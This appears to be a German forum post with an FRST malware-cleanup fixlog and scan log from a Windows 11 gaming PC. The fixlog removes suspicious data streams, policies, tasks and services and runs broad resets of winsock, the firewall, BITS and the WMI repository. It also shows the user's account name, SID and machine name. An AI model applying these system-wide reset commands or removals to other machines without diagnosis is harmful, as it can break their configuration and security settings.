c1663d8406e05cbdec567744319fa26c4971b7cfdeb65f31b0102c0c39adc2443c54bdbfc3256dcd34780490b58eda28f152b5881cc03675246c3bed30a5bec43c42a8854dd44349a86c3d241c9ec164917c37870b465d4dec492d401ca0e4b52d553f9348b54175f4447691dd98ddd85d73f89b4a554a81b0710eb919bde8c89d553f969dd63609ac7f35c46188f6083d74f09986463b49a0161d8d39a7d0a92c79f293c4e47e9030693c9c19b9c9743844b38f06a74a0521122d85e9bdfcacd17237ab0ab76a4531750a00cddbd0541d7a2b98cdc4373dbc1e7e854daefcb02054f3be82b06f4dac5239851195c354f55cb08bc20567c93c76243849b7bdd5ed413d8a9cb55a0554712bed39defa40c14d3e8cdc9779814c6117e0a9a1c2dc2001bcb7cd9751b5d0523c102cdec624117e3ec883f477712c1003ed7d97d85c99403ca9cca63a9c441162e4398be5b5fd7c728cc3c5784584721b8d4195e7241d41fabb47d4669d84172e842ddaf6a5314fad89474669804d4500782c97c0f01d05aba800454a4d546b0c64459dc778ad47f4d00cf642197463628d2995c1bc7d5a37acdd7460e0bc10785c19bcdc08ed07fc92835576c919131ef031b0f704595ef4c40dc440593d450a8938aada042905baabc80565b0b0522d48a5a4ba20755fb39c48167e3d7c4e109d21d8e7a5557e3fb31cd77cb019462ebc24b9c768e54ef59008d74c45906a39bcc1c2bb387d51fb9e1df0484da84f7f24b9a0c424915f2a91c0e45c2958452184b9c2c9a029616aabc8c47769194e03b0c5bbbd543866a8bc9d9064ede45e08c845daf638e5457889c2d423bd484f3a4c1899fb207d6732888425678960481924add6d544511a378d43c665e5a074388d71d8bf383802bfa803277ce95c490df485acec2cd150b6949d5556353813080cb5aafba9594737881d074035bc0a0e68e5bec434a1027da981c04a4540660564dddccda0dd0fb48ec970669cd4430d892497d7a97d5beb844c7469b4a44202f099bde0545d54b397c6f65db5286d3e89d19de7dc21003bc443b76491e4760c81dd9ed9f4246ff0950c31749d9c170e7cb589eaa9e96276b20316635d740a0a9030ded5486d7b739284f05f15544015944189e95c314d3cbc89d737512971799d55bacce8a168b4a5cef742f93d72235045dfd90449437fb909843c95ec423ac43896d8ad2541f5c9c0d46689f4642ab0e580ea80654536ad037457d92d740acc3499f684f51ab7999c2544edc87508b011bac70819563bcc8b55431d6c443940c5d8dacc2d7235991d7066b0a475031ce5bacbb4a5013ab04a603e19241f18c8b5a4e46c7d7df3cbcb903e59f04b7cecb5dde9647d5c7ca882c75fe53c176289fdd8ffd0357ab7c58df56a9d4876084cd1aecbd5b54f74ccdc463e90704d1c9daddee5503d00bfa4cc372349384121541da3e4e43864becd832569fdbc6d7fd469becb4c9d55b3a4cc1739d9311f2b084cd9dfa9857f7a8986c438991052399d11a6fe8445663d8a81944285d06f0244919ef5c4bd74ea8b47676941fc113a1ce5bac5b4ad61bcad48075888c04b7c483da5df50557272a805d03af93d6978ecb1a3bf044978bf89ccd04a411c6b3bed259ec7b5ad057aab0dc742e135740099cda5c1049d7fb2a41c255e85ac4b03c838b5ec48997c7da45d775a4140662888309ece2c6d7fbf96c4463881a812059d31a0bcf81902749f82375d8cf04e02801dbbf9b59179378e0de677f9317d7de82489ebec346e3fa5c8164a0984170af439a9eca43058b88e449577c5a84b18952d8ccc85386fb8a245e449e07c6102301ddae308f568bec804174cdd740a368d2ca4feac854576aec2a45abd6051160034a5c66c410737b048057689904c0a4820a7e1b14571738c9ec53cb43d650bd061a1d7f8195a3aae09a56895b0623d9945b0e5b0ed51b39582a75f656c6f1c703098dda91942b3adc52762d974167890ed84ec74590e73a8cef062f1f47f1ec825d8c2a4f167fdad83b567717c6c0ebc4cdfc2c849647ececaa079c1e4423f5c4983f9689d56b78545b07f91300a79ed1ca9cadc916e73850cb540e1f0410d74859fbfccbd46f3938a167a59b46b23d0618abde4f17d72b1c676780520167c383da2e585ed61b58d03a768f1e8403e64e1b8c7bccd5cf09444d56790a8747ae42981ca68a958f5cb0df469d940440648a1dffda8bd0aa9c15b957aac ========= Ende von CMD: ========= VirusTotal: C:\Users\Pauli\AppData\Local\2613946761 => https://www.virustotal.com/gui/file/72c6a683dad9f1600186b269a195c641a6b430cab850b264e641e88af76b56a6/detection/f-72c6a683dad9f1600186b269a195c641a6b430cab850b264e641e88af76b56a6-1655738899 C:\Users\Pauli\AppData\Local\1355515445 => erfolgreich verschoben C:\Users\Pauli\AppData\Local\2613946761 => erfolgreich verschoben C:\Users\Pauli\AppData\Local\3390820382 => erfolgreich verschoben C:\Users\Pauli\AppData\Local\4096968421 => erfolgreich verschoben "HKU\S-1-5-21-1424437550-2087844553-323541659-1001\Software\Microsoft\Windows\CurrentVersion\Run\\MicrosoftEdgeAutoLaunch_0394F9F0D5AFEC0304440CFD4BF5F89C" => erfolgreich entfernt HKLM\System\CurrentControlSet\Control\Session Manager\\"BootExecute"="autocheck autochk *" => Wert erfolgreich wiederhergestellt C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben C:\Windows\system32\GroupPolicy\User => erfolgreich verschoben C:\Windows\system32\GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User => erfolgreich verschoben C:\ProgramData\NTUSER.pol => erfolgreich verschoben HKLM\SOFTWARE\Policies\Google => erfolgreich entfernt HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{07595C2E-60C1-4CAA-90B7-43A07800F8DF}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07595C2E-60C1-4CAA-90B7-43A07800F8DF}" => erfolgreich entfernt C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1652464033 => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled Autoupdate 1652464033" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5B8095A6-0C1E-4D17-A6BB-1C5756AAB167}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5B8095A6-0C1E-4D17-A6BB-1C5756AAB167}" => erfolgreich entfernt C:\Windows\System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineCore" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A1411766-E2FC-47B4-9195-5EFB2B3C1F58}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A1411766-E2FC-47B4-9195-5EFB2B3C1F58}" => erfolgreich entfernt C:\Windows\System32\Tasks\MicrosoftEdgeUpdateTaskMachineUA => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineUA" => erfolgreich entfernt HKLM\System\CurrentControlSet\Services\edgeupdate => erfolgreich entfernt edgeupdate => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\edgeupdatem => erfolgreich entfernt edgeupdatem => Dienst erfolgreich entfernt HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\SDECon32 => erfolgreich entfernt HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\SDECon64 => erfolgreich entfernt HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\SDECon32 => erfolgreich entfernt HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\SDECon64 => erfolgreich entfernt HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\SDECon32 => erfolgreich entfernt HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\SDECon64 => erfolgreich entfernt C:\Users\Pauli\Anwendungsdaten => ":d988fd1ce0beed92b2bcb751f85f2bf5" ADS erfolgreich entfernt "C:\Users\Pauli\AppData\Roaming" => ":d988fd1ce0beed92b2bcb751f85f2bf5" ADS nicht gefunden. C:\Users\Public\Shared Files => ":VersionCache" ADS erfolgreich entfernt ========= Powershell: ========= Set-MpPreference : Es wurde kein Parameter gefunden, der dem Parameternamen "RealTimeProtectionEnabled" entspricht. In C:\FRST\tmp000.ps1:22 Zeichen:18 + set-mppreference -RealTimeProtectionEnabled $true -force + ~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (:) [Set-MpPreference], ParameterBindingException + FullyQualifiedErrorId : NamedParameterNotFound,Set-MpPreference Set-MpPreference : Es wurde kein Parameter gefunden, der dem Parameternamen "OnAccessProtectionEnabled" entspricht. In C:\FRST\tmp000.ps1:23 Zeichen:18 + set-mppreference -OnAccessProtectionEnabled $true -force + ~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (:) [Set-MpPreference], ParameterBindingException + FullyQualifiedErrorId : NamedParameterNotFound,Set-MpPreference ========= Ende von Powershell: ========= ========= ipconfig /flushdns ========= Windows-IP-Konfiguration Der DNS-Aufl”sungscache wurde geleert. ========= Ende von CMD: ========= ========= netsh winsock reset catalog ========= Der Winsock-Katalog wurde zurckgesetzt. Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen. ========= Ende von CMD: ========= ========= netsh advfirewall reset ========= OK. ========= Ende von CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= OK. ========= Ende von CMD: ========= ========= netsh winhttp reset proxy ========= Aktuelle WinHTTP-Proxyeinstellungen: DirectAccess (kein Proxyserver). ========= Ende von CMD: ========= ========= Bitsadmin /Reset /Allusers ========= BITSADMIN version 3.0 BITS administration utility. (C) Copyright Microsoft Corp. {A3D00BB7-8CBE-4227-865F-A7421C190757} canceled. {DF61D6F1-82F9-4628-A981-7D186C538BB6} canceled. 2 out of 2 jobs canceled. ========= Ende von CMD: ========= ========= Winmgmt /salvagerepository ========= Das WMI-Repository ist konsistent. ========= Ende von CMD: ========= ========= Winmgmt /resetrepository ========= Das WMI-Repository wurde zurckgesetzt. ========= Ende von CMD: ========= ========= winmgmt /resyncperf ========= ========= Ende von CMD: ========= ========= "%WINDIR%\SYSTEM32\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SysWOW64\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SYSTEM32\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SysWOW64\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben Hosts erfolgreich wiederhergestellt. ========= RemoveProxy: ========= "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt "HKU\S-1-5-21-1424437550-2087844553-323541659-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\S-1-5-21-1424437550-2087844553-323541659-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt ========= Ende von RemoveProxy: ========= =========== "C:\WINDOWS\SysWOW64\*.tmp" ========== nicht gefunden ========= Ende -> "C:\WINDOWS\SysWOW64\*.tmp" ======== =========== "C:\WINDOWS\System32\*.tmp" ========== nicht gefunden ========= Ende -> "C:\WINDOWS\System32\*.tmp" ======== =========== "C:\Windows\SystemTemp\*.tmp" ========== C:\Windows\SystemTemp\temB547.tmp => erfolgreich verschoben ========= Ende -> "C:\Windows\SystemTemp\*.tmp" ======== =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 12813842 B Java, Discord, Steam htmlcache => 606090666 B Windows/system/drivers => 4326649 B Edge => 0 B Firefox => 0 B Opera => 13493822 B Temp, IE cache, history, cookies, recent: Default => 0 B ProgramData => 0 B Public => 0 B systemprofile => 0 B systemprofile32 => 7600 B LocalService => 46962 B NetworkService => 240974 B Pauli => 1338297191 B RecycleBin => 2488 B EmptyTemp: => 1.8 GB temporäre Dateien entfernt. ================================ Das System musste neu gestartet werden. ==== Ende von Fixlog 17:28:41 ==== FRST Log: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 19-06-2022 durchgeführt von Pauli (Administrator) auf PAULS_GAMING_PC (ASUS System Product Name) (20-06-2022 17:30:44) Gestartet von C:\Users\Pauli\Desktop Geladene Profile: Pauli Plattform: Microsoft Windows 11 Pro Version 21H2 22000.739 (X64) Sprache: Deutsch (Deutschland) Standard-Browser: Edge Start-Modus: Normal ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe ->) (ASUSTeK COMPUTER INC. -> ) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\SwAgent\ArmourySwAgent.exe (C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmouryWebBrowserEdge.exe <4> (C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2> (C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7> (C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.UserSessionHelper.exe (C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.CpuIdRemote64.exe (C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.DisplayAdapter.exe (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Cef\Lively.PlayerCefSharp.exe (C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Watchdog\Lively.Watchdog.exe (C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Cef\Lively.PlayerCefSharp.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Plugins\Cef\CefSharp.BrowserSubprocess.exe <4> (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE.exe (explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <10> (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\102.0.1245.44\msedgewebview2.exe <9> (explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe (Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (Salfeld Computer GmbH -> Salfeld Computer GmbH) C:\ProgramData\NFS\v3\NFSccsvc.exe (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\CtlSysUI.exe (services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe (services.exe ->) (ASUSTeK COMPUTER INC. -> ASUS Inc.) C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe (services.exe ->) (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe (services.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\2.01.13\AsusFanControlService.exe (services.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe (services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe (services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) C:\Program Files (x86)\LightingService\LightingService.exe (services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUEDevicePluginHost.exe <8> (services.exe ->) (DTS, Inc. -> DTS Inc.) C:\Windows\System32\DTS\PC\APO4x\DtsApo4Service.exe (services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe (services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iastorvd.inf_amd64_fb9e356192ae1106\RstMwService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_d8d8130c2588d45b\OneApp.IGCC.WinService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\piecomponent.inf_amd64_0570478011758f12\Intel_PIE_Service.exe (services.exe ->) (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe (services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe (services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\gamingservices.exe (services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe (services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\msiexec.exe (services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) C:\Windows\System32\CorsairGamingAudioCfgService64.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\NVDisplay.Container.exe <2> (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_fdd83e4dd87bcfa1\RtkAudUService64.exe <2> (services.exe ->) (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\ctlsysmgr.exe (services.exe ->) (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\winctlsvc.exe (services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe (sihost.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x64.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x86.exe (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Compputer Inc.) C:\Program Files\ASUS\AacMB\Aac3572MbHal_x86.exe <2> (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe <6> (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\AacExtCard\extensionCardHal_x86.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x64.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x86.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\UUS\amd64\MoUsoCoreWorker.exe ==================== Registry (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_fdd83e4dd87bcfa1\RtkAudUService64.exe [1376856 2021-10-21] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [CORSAIR iCUE 4 Software] => C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE Launcher.exe [182888 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-07] (Valve Corp. -> Valve Corporation) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32653776 2022-06-18] (Epic Games Inc. -> Epic Games, Inc.) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [MicrosoftEdgeAutoLaunch_0394F9F0D5AFEC0304440CFD4BF5F89C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3595168 2022-06-16] (Microsoft Corporation -> Microsoft Corporation) GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User: Beschränkung <==== ACHTUNG Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============ (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {1A18D701-DA9E-4B06-8BDF-AB747136C81E} - System32\Tasks\ASUS\ArmourySocketServer => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe [1845272 2022-05-17] (ASUSTeK COMPUTER INC. -> ASUS) Task: {3F829885-9B4F-4912-8E83-10CF4230A961} - System32\Tasks\ASUS\AcPowerNotification => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe [305176 2022-05-17] (ASUSTeK COMPUTER INC. -> ASUS) Task: {47F77BB5-8DA2-4E86-83BD-DF4045E80C30} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {4AD1AD68-0494-4673-8E95-51875726705A} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {5E67C348-32A2-4F6B-8445-AADDCD518B82} - System32\Tasks\MicrosoftEdgeShadowStackRollbackTask => C:\Program Files (x86)\Microsoft\Edge\Application\102.0.1245.44\Installer\setup.exe [3256224 2022-06-20] (Microsoft Corporation -> Microsoft Corporation) Task: {6F5AFCD5-F325-406B-8963-D0E7AA36B741} - System32\Tasks\Opera scheduled assistant Autoupdate 1652464039 => C:\Users\Pauli\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Pauli\AppData\Local\Programs\Opera\assistant" $(Arg0) Task: {701147DD-9D64-4887-A971-170DF64FED01} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {737CA134-BE9D-4DD1-80A3-888B8225C1EA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {7EC00491-E7BD-4994-B089-D743E1A8B74D} - System32\Tasks\ASUS\NoiseCancelingEngine => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe [1241960 2021-11-24] (ASUSTeK Computer Inc. -> ASUS) Task: {822F3FA1-B1B0-4A53-8CA5-2F69C2230A19} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {85CD0405-93B5-4BBD-B6B7-53C1EDBD6EE8} - System32\Tasks\Microsoft\Windows\Clip\LicenseImdsIntegration => C:\Windows\system32\fclip.exe [480720 2022-06-17] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {86969224-86CB-43A9-BA0B-076322AF9A33} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-05-20] 